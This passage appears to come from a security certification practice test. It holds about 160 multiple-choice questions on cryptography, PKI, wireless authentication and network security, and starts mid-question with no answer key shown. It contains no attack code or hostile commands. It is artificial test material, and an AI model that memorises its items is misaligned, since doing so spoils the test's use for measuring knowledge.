- you take?
- A. Renew the certificate.
- B. Create and use a self-signed certificate.
- C. Request a certificate from the key escrow.
- D. Generate a new key pair and new certificate.
- 3. Mary is concerned about the validity of an email because a coworker denies sending it.
- How can Mary prove the authenticity of the email?
- A. Symmetric algorithm
- B. Digital signature
- C. CRL
- D. Asymmetric algorithm
- 4. Wi-Fi Alliance recommends that a passphrase be how many characters in length for
- WPA2-Personal security?
- A. 6 characters
- B. 8 characters
- C. 12 characters
- D. 16 characters
- 5. Which of the following digital certificate management practices will ensure that a lost
- certificate is not compromised?
- A. CRL
- B. Key escrow
- C. Nonrepudiation
- D. Recovery agent
- 6. Which of the following are restricted to 64-bit block sizes? (Choose two.)
- A. DES
- B. SHA
- C. MD5
- D. 3DES
- 7. Your company has implemented a RADIUS server and has clients that are capable of using
- multiple EAP types, including one configured for use on the RADIUS server. Your security manager wants to implement a WPA2-Enterprise system. Since you have the RADIUS
- server and clients, what piece of the network would you need?
- A. Network access control
- B. Authentication server
- C. Authenticator
- D. Supplicant
- 8. You are given the task of selecting an asymmetric encryption type that has an appropriate
- level of encryption strength but uses a smaller key length than is typically required. Which
- of the following encryption methods will accomplish your requirement?
- A. Blowfish
- B. RSA
- C. DHE
- D. ECC
- 9. Matt has been told that successful attacks have been taking place and data that has been
- encrypted by his company’s software system has leaked to the company’s competitors.
- Matt, through investigation, has discovered patterns due to the lack of randomness in
- the seeding values used by the encryption algorithm in the company’s software. This
- discovery has led to successful reverse engineering. What can the company use to ensure
- patterns are not created during the encryption process?
- A. One-time pad
- B. Initialization vector
- C. Stream cipher
- D. Block cipher
- 10. You are asked to configure a WLAN that does not require a user to provide any credentials to associate with a wireless AP and access a WLAN. What type of authentication is
- said to be in use?
- A. IV
- B. WEP
- C. WPA
- D. Open
- 11. The CIO at your company no longer wants to use asymmetric algorithms because of the
- cost. Of the following algorithms, which should the CIO discontinue using?
- A. AES
- B. RC4
- C. RSA
- D. Twofish
- 12. Which of the following would you use to verify certificate status by receiving a response
- of “good,” “revoked,” or “unknown”?
- A. CRL
- B. OCSP
- C. RA
- D. PKI
- 13. Which of the following symmetric key algorithms are block ciphers? (Choose two.)
- A. MD5
- B. 3DES
- C. RC4
- D. Blowfish
- 14. Which of the following encryption algorithms is the weakest?
- A. Blowfish
- B. AES
- C. DES
- D. SHA
- 15. What encryption protocol does WEP improperly use?
- A. RC6
- B. RC4
- C. AES
- D. DES
- 16. James, an IT manager, expresses a concern during a monthly meeting about weak user
- passwords used on company servers and how they may be susceptible to brute-force
- password attacks. Which concept can James implement to make the weak passwords
- stronger?
- A. Key stretching
- B. Key escrow
- C. Key strength
- D. ECC
- 17. You are installing a network for a small business named Matrix Interior Design that the
- owner is operating out of their home. There are only four devices that will use the wireless
- LAN, and you are installing a SOHO wireless router between the wireless LAN clients
- and the broadband connection. To ensure better security from outside threats connecting
- to the wireless SOHO router, which of the following would be a good choice for the
- WPA2-PSK passphrase?
- A. 123456
- B. XXrcERr6Euex9pRCdn3h3
- C. bRtlBv
- D. HomeBusiness
- 18. You set up your wireless SOHO router to encrypt wireless traffic, and you configure the
- router to require wireless clients to authenticate against a RADIUS server. What type of
- security have you configured?
- A. WPA2 Enterprise
- B. WPA2 Personal
- C. TKIP
- D. WEP
- 19. You must implement a cryptography system that applies encryption to a group of data at a
- time. Which of the following would you choose?
- A. Stream
- B. Block
- C. Asymmetric
- D. Symmetric
- 20. Which symmetric block cipher supersedes Blowfish?
- A. RSA
- B. Twofish
- C. MD5
- D. PBKDF2
- 21. Root CAs can delegate their authority to which of the following to issue certificates to
- users?
- A. Registered authorities
- B. Intermediate CAs
- C. CRL
- D. CSR
- 22. Which of the following protocols should be used to authenticate remote access users with
- smartcards?
- A. PEAP
- B. EAP-TLS
- C. CHAP
- D. MS-CHAPv2
- 23. Tom is sending Mary a document and wants to show the document came from him.
- Which of the following should Tom use to digitally sign the document?
- A. TKIP
- B. Intermediate CA
- C. Public key
- D. Private key
- 24. Which of the following EAP types offers support for legacy authentication protocols such
- as PAP, CHAP, MS-CHAP, or MS-CHAPv2?
- A. PEAP
- B. EAP-FAST
- C. EAP-TLS
- D. EAP-TTLS
- 25. You are conducting a training program for new network administrators for your
- company. You talk about the benefits of asymmetric encryption. Which of the following
- are considered asymmetric algorithms? (Choose two.)
- A. RC4
- B. DES
- C. RSA
- D. ECC
- 26. Which of the following is a form of encryption also known as ROT13?
- A. Substitution cipher
- B. Transposition cipher
- C. Diffusion
- D. Confusion
- 27. Matt needs to calculate the number of keys that must be generated for 480 employees
- using the company’s PKI asymmetric algorithm. How many keys must Matt create?
- A. 114,960
- B. 480
- C. 960
- D. 229,920
- 28. You are conducting a one-time electronic transaction with another company. The transaction needs to be encrypted, and for efficiency and simplicity, you want to use a single key
- for encryption and decryption of the data. Which of the following types would you use?
- A. Asymmetric
- B. Symmetric
- C. Hashing
- D. Steganography
- 29. Which of the following uses two mathematically related keys to secure data during
- transmission?
- A. Twofish
- B. 3DES
- C. RC4
- D. RSA
- 30. You have been instructed by the security manager to protect the server’s data-at-rest.
- Which of the following would provide the strongest protection?
- A. Implement a full-disk encryption system.
- B. Implement biometric controls on data entry points.
- C. Implement a host-based intrusion detection system.
- D. Implement a host-based intrusion prevention system.
- 31. Which of the following EAP types use a three-phase operation?
- A. EAP-FAST
- B. EAP-TLS
- C. EAP-TTLS
- D. PEAP
- 32. Which of the following is an encryption standard that uses a single 56-bit symmetric key?
- A. DES
- B. 3DES
- C. AES
- D. WPS
- 33. Which of the following cryptography concepts converts output data into a fixed-length
- value and cannot be reversed?
- A. Steganography
- B. Hashing
- C. Collision
- D. IV
- 34. SSL is a protocol used for securing transactions transmitting over an untrusted network
- such as the Internet. Which of the following best describes the action that occurs during
- the SSL connection setup process?
- A. The client creates a session key and encrypts it with the server’s private key.
- B. The client creates a session key and encrypts it with the server’s public key.
- C. The server creates a session key and encrypts it with the client’s private key.
- D. The server creates a session key and encrypts it with the client’s public key.
- 35. Which of the following EAP types requires both server and client certificates?
- A. EAP-FAST
- B. PEAP
- C. EAP-TLS
- D. EAP-TTLS
- 36. You are the network administrator for a small office of 35 users and need to utilize mail
- encryption that will allow specific users to encrypt outgoing email messages. You are
- looking for an inexpensive onsite encryption server. Which of the following would you
- implement?
- A. PGP/GPG
- B. WPA2
- C. CRL
- D. EAP-TLS
- 37. You have been promoted to security administrator for your company and you need to be
- aware of all types of hashing algorithms for integrity checks. Which algorithm offers a
- 160-bit digest?
- A. MD5
- B. RC4
- C. SHA-1
- D. AES
- 38. You are the security manager for your company, and a system administrator wants to
- know if there is a way to reduce the cost of certificates by purchasing a certificate to cover
- all domains and subdomains for the company. Which of the following solutions would
- you offer?
- A. Wildcards
- B. Object identifiers
- C. Key escrow
- D. OCSP
- 39. Which of the following are authentication protocols? (Choose two.)
- A. WPS
- B. EAP
- C. IPSec
- D. IEEE 802.1x
- 40. Your company is looking to accept electronic orders from a vendor and wants to ensure
- nonauthorized people cannot send orders. Your manager wants a solution that provides
- nonrepudiation. Which of the following options would meet the requirements?
- A. Digital signatures
- B. Hashes
- C. Steganography
- D. Perfect forward secrecy
- 41. You are tasked to implement a solution to ensure data that are stored on a removable USB
- drive hasn’t been tampered with. Which of the following would you implement?
- A. Key escrow
- B. File backup
- C. File encryption
- D. File hashing
- 42. Which of the following is mainly used for remote access into a network?
- A. TACACS+
- B. XTACACS
- C. Kerberos
- D. RADIUS
- 43. A security manager has asked you to explain why encryption is important and what
- symmetric encryption offers. Which of the following is the best explanation?
- A. Confidentiality
- B. Nonrepudiation
- C. Steganography
- D. Collision
- 44. You are a security administrator and have discovered one of the employees has been
- encoding confidential information into graphic files. Your employee is sharing these pictures on their social media account. What concept was the employee using?
- A. Hashing
- B. Steganography
- C. Symmetric algorithm
- D. Asymmetric algorithm
- 45. Your company’s branch offices connect to the main office through a VPN. You recently
- discovered the key used on the VPN has been compromised. What should you do to
- ensure the key isn’t compromised in the future?
- A. Enable perfect forward secrecy at the main office and branch office ends of the VPN.
- B. Enable perfect forward secrecy at the main office end of the VPN.
- C. Enable perfect forward secrecy at the branch office end of the VPN.
- D. Disable perfect forward secrecy at the main office and branch office ends of the VPN.
- 46. You are configuring your friend’s new wireless SOHO router and discover a PIN on the
- back of the router. Which of the following best describes the purpose of the PIN?
- A. This is a WEP PIN.
- B. This is a WPS PIN.
- C. This is a WPA PIN.
- D. This is a Bluetooth PIN.
- 47. Which of the following benefits do digital signatures provide? (Choose two.)
- A. Nonrepudiation
- B. Authentication
- C. Encryption
- D. Key exchange
- 48. Your company has asked you to recommend a secure method for password storage. Which
- of the following would provide the best protection against brute-force attacks? (Choose
- two.)
- A. ROT13
- B. MD5
- C. PBKDF2
- D. BCRYPT
- 49. Your IT support center is receiving a high number of calls stating that users trying to
- access the company’s website are receiving certificate errors within their browsers. Which
- of the following statements best describes what the issue is?
- A. The website certificate has expired.
- B. Users have forgotten their usernames or passwords.
- C. The domain name has expired.
- D. The network is currently unavailable.
- 50. In asymmetric encryption, what is used to decrypt an encrypted file?
- A. Private key
- B. Public key
- C. Message digest
- D. Ciphertext
- 51. You are performing a vulnerability assessment on a company’s LAN and determine they
- are using 802.1x for secure access. Which of the following attacks can a threat actor use
- to bypass the network security?
- A. MAC spoofing
- B. ARP poisoning
- C. Ping of death
- D. Xmas attack
- 52. Your security manager is looking to implement a one-time pad scheme for the company’s
- salespeople to use when traveling. Which of the following best describes a requirement for
- this implementation? (Choose three.)
- A. The pad must be distributed securely and protected at its destination.
- B. The pad must always be the same length.
- C. The pad must be used only one time.
- D. The pad must be made up of truly random values.
- 53. A threat actor has created a man-in-the-middle attack and captured encrypted communication between two users. The threat actor was unable to decrypt the messages. Which of
- the following is the reason the threat actor is unable to decrypt the messages?
- A. Hashing
- B. Symmetric encryption
- C. Asymmetric encryption
- D. Key escrow
- 54. You have implemented a PKI to send signed and encrypted data. The user sending data
- must have which of the following? (Choose two.)
- A. The receiver’s private key
- B. The sender’s private key
- C. The sender’s public key
- D. The receiver’s public key
- 55. Which of the following best describes the drawback of symmetric key systems?
- A. You must use different keys for encryption and decryption.
- B. The algorithm is more complex.
- C. The system works much more slowly than an asymmetric system.
- D. The key must be delivered in a secure manner.
- 56. Your company is looking for a secure backup mechanism for key storage in a PKI. Which
- of the following would you recommend?
- A. CSR
- B. Key escrow
- C. CRL
- D. CA
- 57. Which cryptography concept uses points on a curve to define public and private key pairs?
- A. Obfuscation
- B. ECC
- C. Stream cipher
- D. Block cipher
- 58. You are a security administrator and have been given instructions to update the access
- points to provide a more secure connection. The access points are currently set to use
- WPA TKIP for encryption. Which of the following would you configure to accomplish the
- task of providing a more secure connection?
- A. WEP
- B. WPA2 CCMP
- C. Enable MAC filtering
- D. Disable SSID broadcast
- 59. Which of the following is an example of a stream cipher?
- A. AES
- B. DES
- C. 3DES
- D. RC4
- 60. Which of the following are negotiation protocols commonly used by TLS? (Choose two.)
- A. DHE
- B. ECDHE
- C. RSA
- D. SHA
- 61. Which of the following statements is true regarding symmetric key systems?
- A. They use different keys on each end of the transported data.
- B. They use public key cryptography.
- C. They use multiple keys for creating digital signatures.
- D. They use the same key on each end of the transported data.
- 62. Which of the following ciphers was created from the foundation of the Rijndael
- algorithm?
- A. TKIP
- B. AES
- C. DES
- D. 3DES
- 63. Katelyn is sending an important email to Zackary, the manager of human resources.
- Company policy states messages to human resources must be digitally signed. Which of
- the following statements is correct?
- A. Katelyn’s public key is used to verify the digital signature.
- B. Katelyn’s private key is used to verify the digital signature.
- C. Zackary’s public key is used to verify the digital signature.
- D. Zackary’s private key is used to verify the digital signature.
- 64. Data integrity is provided by which of the following?
- A. 3DES
- B. MD5
- C. AES
- D. Blowfish
- 65. Which of the following is a symmetric encryption algorithm that is available in 128-bit,
- 192-bit, and 256-bit key versions?
- A. AES
- B. DES
- C. RSA
- D. TKIP
- 66. Which of the following items are found within a digital certificate? (Choose two.)
- A. Serial number
- B. Default gateway
- C. Public key
- D. Session key
- 67. In an 802.1x implementation, which of the following devices mutually authenticate with
- each other? (Choose two.)
- A. Authentication server
- B. Certificate authority
- C. Domain controller
- D. Supplicant
- 68. Which of the following statements is true regarding the confusion encryption method?
- A. It puts one item in the place of another; for example, one letter for another or one
- letter for a number.
- B. It scrambles data by reordering the plain text in a certain way.
- C. It uses a relationship between the plain text and the key that is so complicated the
- plain text can’t be altered and the key can’t be determined.
- D. Change in the plain text will result in multiple changes that are spread throughout
- the cipher text.
- 69. Which of the following is required when employing PKI and preserving data is important?
- A. CA
- B. CRL
- C. Key escrow
- D. CER
- 70. You need to encrypt the signature of an email within a PKI system. Which of the following would you use?
- A. CER
- B. Public key
- C. Shared key
- D. Private key
- 71. Which of the following standards was developed by the Wi-Fi Alliance and implements
- the requirements of IEEE 802.11i?
- A. NIC
- B. WPA
- C. WPA2
- D. TKIP
- 72. You are asked to create a wireless network for your company that implements a wireless protocol that provides maximum security while providing support for older wireless devices. Which protocol should you use?
- A. WPA
- B. WPA2
- C. WEP
- D. IV
- 73. Bob is a security administrator and needs to encrypt and authenticate messages that are
- sent and received between two systems. Which of the following would Bob choose to
- accomplish his task?
- A. Diffie-Hellman
- B. MD5
- C. SHA-256
- D. RSA
- 74. Which of the following algorithms is generally used in mobile devices?
- A. 3DES
- B. DES
- C. ECC
- D. AES
- 75. Which of the following statements best describes the difference between public key
- cryptography and public key infrastructure?
- A. Public key cryptography is another name for an asymmetric algorithm, whereas
- public key infrastructure is another name for a symmetric algorithm.
- B. Public key cryptography uses one key to encrypt and decrypt the data, and public key
- infrastructure uses two keys to encrypt and decrypt the data.
- C. Public key cryptography is another name for asymmetric cryptography, whereas
- public key infrastructure contains the public key cryptographic mechanisms.
- D. Public key cryptography provides authentication and nonrepudiation, whereas public
- key infrastructure provides confidentiality and integrity.
- 76. Your company has a public key infrastructure (PKI) in place to issue digital certificates to users. Recently, your company hired temporary contractors for a project that is now complete. Management has requested that all digital certificates issued to the contractors be revoked. Which PKI component would you consult for the management’s request?
- A. CA
- B. CRL
- C. RA
- D. CSR
- 77. Which of the following security setup modes are intended for use in a small office or
- home office environment? (Choose two.)
- A. WPS
- B. WPA-Enterprise
- C. WPA2-Enterprise
- D. WPA2-Personal
- 78. Which of the following automatically updates browsers with a list of root certificates from
- an online source to track which certificates are to be trusted?
- A. Trust model
- B. Key escrow
- C. PKI
- D. RA
- 79. Which of the following EAP types uses the concepts of public key infrastructure (PKI)?
- A. EAP-TLS
- B. PEAP
- C. EAP-FAST
- D. EAP-TTLS
- 80. Which of the following use PSK authentication? (Choose two.)
- A. WPA-Enterprise
- B. WPA-Personal
- C. WPA2-Personal
- D. WPA2-Enterprise
- 81. You are receiving calls from users who are connected to the company’s network and
- are being redirected to a login page with the company’s logo after they type a popular
- social media web address in an Internet browser. Which of the following is causing this to
- happen?
- A. WEP
- B. Key stretching
- C. MAC filtering
- D. Captive portal
- 82. Elliptic curve cryptosystem (ECC) is an asymmetric algorithm. Which of the following
- statements best describe why ECC is different from other asymmetric algorithms?
- (Choose two.)
- A. It is more efficient.
- B. It provides digital signatures, secure key distribution, and encryption.
- C. It uses more processing power to perform encryption.
- D. It provides fast key generation.
- 83. WEP’s RC4 approach to encryption uses a 24-bit string of characters added to data
- that are transmitted. The same plain text data frame will not appear as the same WEP-
- encrypted data frame. What is this string of characters called?
- A. Diffusion
- B. IV
- C. Session key
- D. Hashing
- 84. Your manager has recently purchased a RADIUS server that will be used by remote
- employees to connect to internal resources. Several client computers need to connect to the
- RADIUS server in a secure manner. What should your manager deploy?
- A. HIDS
- B. UTM
- C. VLAN
- D. 802.1x
- 85. Katelyn, a network administrator, has deleted the account for a user who left the company
- last week. The user’s files were encrypted with a private key. How can Katelyn view the
- user’s files?
- A. The data can be decrypted using the backup user account.
- B. The data can be decrypted using the recovery agent.
- C. She must re-create the former user’s account.
- D. The data can be decrypted using a CRL.
- 86. Your company has recently implemented an encryption system on the network. The system uses a secret key shared between two parties that must be kept secret. Which system was implemented?
- A. Asymmetric algorithm
- B. Symmetric algorithm
- C. Hashing algorithm
- D. Steganography
- 87. Tim, a wireless administrator, has been tasked with securing the company’s WLAN.
- Which of the following cryptographic protocols would Tim use to provide the most secure
- environment for the company?
- A. WPA2 CCMP
- B. WEP
- C. WPA
- D. WPA2 TKIP
- 88. Which of the following defines a hashing algorithm creating the same hash value from
- two different messages?
- A. AES
- B. MD5
- C. Hashing
- D. Collision
- 89. Matt, a network administrator, is deciding which credential-type authentication to
- use within the company’s planned 802.1x deployment. He is searching for a method
- that requires a client certificate and a server-side certificate, and that uses tunnels for
- encryption. Which credential-type authentication method would Matt use?
- A. EAP-TLS
- B. EAP-FAST
- C. PEAP
- D. EAP
- 90. A coworker is connecting to a secure website using HTTPS. The coworker informs you that before the website loads, their web browser displays an error indicating that the site certificate is invalid and the site is not trusted. Which of the following is most likely the issue?
- A. The web browser is requiring an update.
- B. The server is using a self-signed certificate.
- C. A web proxy is blocking the connection.
- D. The web server is currently unavailable.
- 91. Zack, an administrator, needs to renew a certificate for the company’s web server. Which
- of the following would you recommend Zack submit to the CA?
- A. CSR
- B. Key escrow
- C. CRL
- D. OCSP
- 92. Which of the following types of encryption offers easy key exchange and key management?
- A. Obfuscation
- B. Asymmetric
- C. Symmetric
- D. Hashing
- 93. Which of the following is used to exchange cryptographic keys?
- A. Diffie-Hellman
- B. HMAC
- C. ROT13
- D. RC4
- 94. Which of the following encryption algorithms is used to encrypt and decrypt data?
- A. MD5
- B. HMAC
- C. Kerberos
- D. RC4
- 95. Which of the following provides additional encryption strength by repeating the encryption process with additional keys?
- A. 3DES
- B. AES
- C. Twofish
- D. Blowfish
- 96. Which of the following security mechanisms can be used for the purpose of nonrepudiation?
- A. Encryption
- B. Digital signature
- C. Collision
- D. CA
- 97. You are a network administrator for your company, and the single AP that allows clients to connect to the wireless LAN is configured with a WPA-PSK preshared key of the company name followed by the number 1. Which of the following statements is correct regarding this implementation?
- A. It is secure because WPA-PSK resolved the problem with WEP.
- B. It is secure because the preshared key is at least five characters long.
- C. It is not secure because the preshared key includes only one number and the company
- name so it can be easily guessed.
- D. It is not secure because WPA-PSK is as insecure as WEP and should never be used.
- 98. You are a security technician and have been given the task to implement a PKI on the
- company’s network. When verifying the validity of a certificate, you want to ensure
- bandwidth isn’t consumed. Which of the following can you implement?
- A. CRL
- B. OCSP
- C. Key escrow
- D. CA
- 99. Which of the following types of devices are found in a network that supports the Wi-Fi Protected Setup (WPS) protocol? (Choose three.)
- A. Registrar
- B. Supplicant
- C. Enrollee
- D. Access Point
- 100. You are a network administrator for a distribution company and the manager wants to
- implement a secure wireless LAN for a BYOD policy. Through research, you determine that
- the company should implement AES encryption and the 802.1x authentication protocol. You
- also determine that too many APs and clients will be installed and you will need to configure
- each one with a preshared key passphrase. Which of the following will meet your needs?
- A. WEP
- B. WPA
- C. WPA2-Personal
- D. WPA2-Enterprise
- 101. The process of deleting data by sending a single erase or clear instruction to an address of
- the nonvolatile memory is an example of securing which of the following?
- A. Data-in-transit
- B. Data-over-the-network
- C. Data-in-use
- D. Data-at-rest
- 102. Which of the following is an authentication service and uses UDP as a transport medium?
- A. TACACS+
- B. RADIUS
- C. LDAP
- D. Kerberos
- 103. Which of the following is true regarding the importance of encryption of data-at-rest for
- sensitive information?
- A. It renders the recovery of data more difficult should the user lose their password.
- B. It allows the user to verify the integrity of the data on the stored device.
- C. It prevents the sensitive data from being accessed after a theft of the physical equipment.
- D. It renders the recovery of data easier should the user lose their password.
- 104. You are a network administrator and your manager has asked you to enable WPA2
- CCMP for wireless clients, along with an encryption to protect the data transmitting
- across the network. Which of the following encryption methods would you use along with
- WPA2 CCMP?
- A. RC4
- B. DES
- C. AES
- D. 3DES
- 105. Which of the following is the least secure hashing algorithm?
- A. MD5
- B. RIPEMD
- C. SHA-1
- D. AES
- 106. Which of the following types of attack sends two different messages using the same hash
- function, causing a collision?
- A. Xmas attack
- B. DoS
- C. Logic bomb
- D. Birthday attack
- 107. Which of the following defines a file format commonly used to store private keys with
- associated public key certificates?
- A. PKCS #1
- B. PKCS #3
- C. PKCS #7
- D. PKCS #12
- 108. Which of the following statements are true regarding ciphers? (Choose two.)
- A. Stream ciphers encrypt fixed sizes of data.
- B. Stream ciphers encrypt data one bit at a time.
- C. Block ciphers encrypt data one bit at a time.
- D. Block ciphers encrypt fixed sizes of data.
- 109. Which of the following are effective key sizes, in bits, for 3DES? (Choose three.)
- A. 56
- B. 112
- C. 128
- D. 168
- 110. Which of the following statements is true about symmetric algorithms?
- A. They hide data within an image file.
- B. They use one key to encrypt data and another to decrypt data.
- C. They use a single key to encrypt and decrypt data.
- D. They use a single key to create a hashing value.
- 111. The CA is responsible for revoking certificates when necessary. Which of the following statements best describes the relationship between a CRL and OCSP?
- A. OCSP is a protocol to submit revoked certificates to a CRL.
- B. CRL is a more streamlined approach to OCSP.
- C. CRL validates a certificate in real time and reports it to the OCSP.
- D. OCSP is a protocol to check the CRL during a certificate validation process.
- 112. Which of the following XORs each bit of a character with the corresponding bit of the secret key?
- A. ECDHE
- B. PBKDF2
- C. Obfuscation
- D. One-time pad
- 113. Which of the following works similarly to stream ciphers?
- A. One-time pad
- B. RSA
- C. AES
- D. DES
- 114. Your manager wants to implement a security measure to protect sensitive company data
- that reside on the remote salespeople’s laptops should they become lost or stolen. Which
- of the following measures would you implement?
- A. Implement WPS on the laptops.
- B. Set BIOS passwords on the laptops.
- C. Use whole-disk encryption on the laptops.
- D. Use cable locks on the laptops.
- 115. You want to send confidential messages to a friend through email, but you do not have a
- way of encrypting the message. Which of the following methods would help you achieve
- this goal?
- A. AES
- B. Collision
- C. RSA
- D. Steganography
- 116. Which of the following cipher modes uses a feedback-based encryption method to ensure
- that repetitive data result in unique cipher text?
- A. ECB
- B. CBC
- C. GCM
- D. CTM
- 117. Which statement is true regarding the difference between a secure cipher and a secure
- hash?
- A. A secure hash can be reversed; a secure cipher cannot.
- B. A secure cipher can be reversed; a secure hash cannot.
- C. A secure hash produces a variable output for any input size; a secure cipher does not.
- D. A secure cipher produces the same size output for any input size; a hash does not.
- 118. Which certificate format is typically used on Windows OS machines to import and export
- certificates and private keys?
- A. DER
- B. AES
- C. PEM
- D. PFX
- 119. What is another name for an ephemeral key?
- A. PKI private key
- B. MD5
- C. PKI public key
- D. Session key
- 120. Why would a threat actor use steganography?
- A. To test integrity
- B. To conceal information
- C. To encrypt information
- D. To create a hashing value
- 121. The CIO has instructed you to set up a system where credit card data will be encrypted
- with the most secure symmetric algorithm with the least amount of CPU usage. Which of
- the following algorithms would you choose?
- A. AES
- B. SHA-1
- C. MD5
- D. 3DES
- 122. Which of the following encryption methods is used by RADIUS?
- A. Asymmetric
- B. Symmetric
- C. Elliptic curve
- D. RSA
- 123. When setting up a secure wireless company network, which of the following should you
- avoid?
- A. WPA
- B. WPA2
- C. EAP-TLS
- D. PEAP
- 124. You want to authenticate and log connections from wireless users connecting with
- EAP-TLS. Which of the following should be used?
- A. Kerberos
- B. LDAP
- C. SAML
- D. RADIUS
- 125. Which of the following would be used to allow certain traffic to traverse from a wireless
- network to an internal network?
- A. WPA
- B. WEP
- C. Load balancers
- D. 802.1x
- 126. You are asked to see if several confidential files have changed, and you decide to use an
- algorithm to create message digests for the confidential files. Which algorithm would
- you use?
- A. AES
- B. RC4
- C. Blowfish
- D. SHA-1
- 127. Network data needs to be encrypted, and you are required to select a cipher that will
- encrypt 128 bits at a time before the data are sent across the network. Which of the
- following would you choose?
- A. Stream cipher
- B. Hash algorithm
- C. Block cipher
- D. Obfuscation
- 128. Which of the following are considered cryptographic hash functions? (Choose two.)
- A. AES
- B. MD5
- C. RC4
- D. SHA-256
- 129. A company’s database is beginning to grow, and the data-at-rest are becoming a concern
- with the security administrator. Which of the following is an option to secure the
- data-at-rest?
- A. SSL certificate
- B. Encryption
- C. Hashing
- D. TLS certificate
- 130. Which of the following hardware devices can store keys? (Choose two.)
- A. USB flash drive
- B. Smartcard
- C. PCI expansion card
- D. Cipher lock
- 131. You are a security manager and have been asked to encrypt database system information that contains employee social security numbers. You are looking for an encryption standard that is fast and secure. Which of the following would you suggest to accomplish the requirements?
- A. SHA-256
- B. AES
- C. RSA
- D. MD5
- 132. James is a security administrator and wants to ensure the validity of public trusted certificates used by the company’s web server, even if there is an Internet outage. Which of the following should James implement?
- A. Key escrow
- B. Recovery agent
- C. OCSP
- D. CSR
- 133. You are a security administrator looking to implement a two-way trust model. Which of
- the following would you use?
- A. ROT13
- B. PGP
- C. WPA2
- D. PKI
- 134. If a threat actor obtains an SSL private key, what type of attack can be performed?
- (Choose two.)
- A. Eavesdropping
- B. Man-in-the-middle
- C. Social engineering
- D. Brute force
- 135. Most authentication systems make use of a one-way encryption process. Which of the
- following is an example of a one-way encryption?
- A. Symmetric algorithm
- B. Hashing
- C. Asymmetric algorithm
- D. PKI
- 136. Which of the following transpires in a PKI environment?
- A. The CA signs the certificate.
- B. The RA signs the certificate.
- C. The RA creates the certificate and the CA signs it.
- D. The CA creates the certificate and the RA signs it.
- 137. Which of the following statements best describes how a digital signature is created?
- A. The sender encrypts a message digest with the receiver’s public key.
- B. The sender encrypts a message digest with the receiver’s private key.
- C. The sender encrypts a message digest with his or her private key.
- D. The sender encrypts a message digest with his or her public key.
- 138. AES is an algorithm used for which of the following?
- A. Encrypting a large amount of data
- B. Encrypting a small amount of data
- C. Key recovery
- D. Key revocation
- 139. PEAP protects authentication transfers by implementing which of the following?
- A. TLS tunnels
- B. SSL tunnels
- C. AES
- D. SHA hashes
- 140. AES-CCMP uses a 128-bit temporal key and encrypts data in what block size?
- A. 256
- B. 192
- C. 128
- D. 64
- 141. Which of the following implement Message Integrity Code (MIC)? (Choose two.)
- A. AES
- B. DES
- C. CCMP
- D. TKIP
- 142. James, a WLAN security engineer, recommends to management that WPA-Personal security should not be deployed within the company’s WLAN for their vendors. Which of the following statements best describe James’s recommendation? (Choose two.)
- A. Static preshared passphrases are susceptible to social engineering attacks.
- B. WPA-Personal uses public key encryption.
- C. WPA-Personal uses a weak TKIP encryption.
- D. WPA-Personal uses a RADIUS authentication server.
- 143. Which of the following is correct regarding root certificates?
- A. Root certificates never expire.
- B. A root certificate contains the public key of the CA.
- C. A root certificate contains information about the user.
- D. A root certificate cannot be used to authorize subordinate CAs to issue certificates on
- its behalf.
- 144. Which of the following statements are correct about public and private key pairs?
- (Choose two.)
- A. Public and private keys work in isolation of each other.
- B. Public and private keys work in conjunction with each other as a team.
- C. If the public key encrypts the data using an asymmetric encryption algorithm, the
- corresponding private key is used to decrypt the data.
- D. If the private key encrypts the data using an asymmetric encryption algorithm, the
- receiver uses the same private key to decrypt the data.
- 145. Which of the following are the filename extensions for PKCS #12 files? (Choose two.)
- A. .p12
- B. .KEY
- C. .pfx
- D. .p7b
- 146. Your company has discovered that several confidential messages have been intercepted.
- You decide to implement a web of trust to encrypt the files. Which of the following are
- used in a web of trust concept? (Choose two.)
- A. RC4
- B. AES
- C. PGP
- D. GPG
- 147. Which of the following algorithms is typically used to encrypt data-at-rest?
- A. Symmetric
- B. Asymmetric
- C. Stream
- D. Hashing
- 148. Which of the following can assist in the workload of the CA by performing identification
- and authentication of users requesting certificates?
- A. Root CA
- B. Intermediate CA
- C. Registered authority
- D. OCSP
- 149. You recently upgraded your wireless network so that your devices will use the 802.11n
- protocol. You want to ensure all communication on the wireless network is secure with
- the strongest encryption. Which of the following is the best choice?
- A. WEP
- B. WPA
- C. WPA2
- D. WPS
- 150. A college wants to move data to a USB flash drive and has asked you to suggest a way to
- secure the data in a quick manner. Which of the following would you suggest?
- A. 3DES
- B. SHA-256
- C. AES-256
- D. SHA-512
- Chapter 7
- Practice Test
- 1. You are asked to separate the Sales and Marketing department’s network traffic on a layer 2 device within a LAN. This will reduce broadcast traffic and prevent the departments from seeing each other’s resources. Which of the following types of network design would be the best choice?
- A. MAC
- B. NAT
- C. VLAN
- D. DMZ
- 2. You are a network administrator and your company has asked you to perform a survey of the campus for open Wi-Fi access points. You walk around with your smartphone looking for unsecured access points that you can connect to without a password. What type of penetration testing concept is this called?
- A. Escalation of privilege
- B. Active reconnaissance
- C. Passive reconnaissance
- D. Black-box
- 3. Which of the following is a certificate-based authentication that allows individuals access
- to U.S. federal resources and facilities?
- A. Proximity card
- B. TOTP
- C. PIV card
- D. HOTP
- 4. You attempt to log into your company’s network with a laptop. The laptop is quarantined to a restricted VLAN until the laptop’s virus definitions are updated. Which of the following best describes this network component?
- A. NAT
- B. HIPS
- C. DMZ
- D. NAC
- 5. You have been asked to implement a security control that will limit tailgating in high-secured areas. Which of the following security controls would you choose?
- A. Mantrap
- B. Faraday cage
- C. Airgap
- D. Cable locks
- 6. Your company’s network administrator is placing an Internet web server in an isolated
- area of the company’s network for security purposes. Which of the following architecture
- concepts is the network administrator implementing?
- A. Honeynet
- B. DMZ
- C. Proxy
- D. Intranet
- 7. Your company is offering a new product on its website. You are asked to ensure availability of the web server when it receives a large number of requests. Which of the following would be the best option to fulfill this request?
- A. VPN concentrator
- B. NIPS
- C. SIEM
- D. Load balancer
- 8. You are a security administrator for a manufacturing company that produces compounded medications. To ensure individuals are not accessing sensitive areas where the medications are created, you want to implement a physical security control. Which of the following would be the best option?
- A. Security guard
- B. Signs
- C. Faraday cage
- D. Cameras
- 9. An attacker exploited a bug, unknown to the developer, to gain access to a database
- server. Which of the following best describes this type of attack?
- A. Zero-day
- B. Cross-site scripting
- C. ARP poisoning
- D. Domain hijacking
- 10. A new employee added network drops to a new section of the company’s building. The
- cables were placed across several fluorescent lights. When users attempted to connect to
- the data center on the network, they experienced intermittent connectivity. Which of the
- following environmental controls was the most likely cause of this issue?
- A. DMZ
- B. EMI
- C. BIOS
- D. TPM
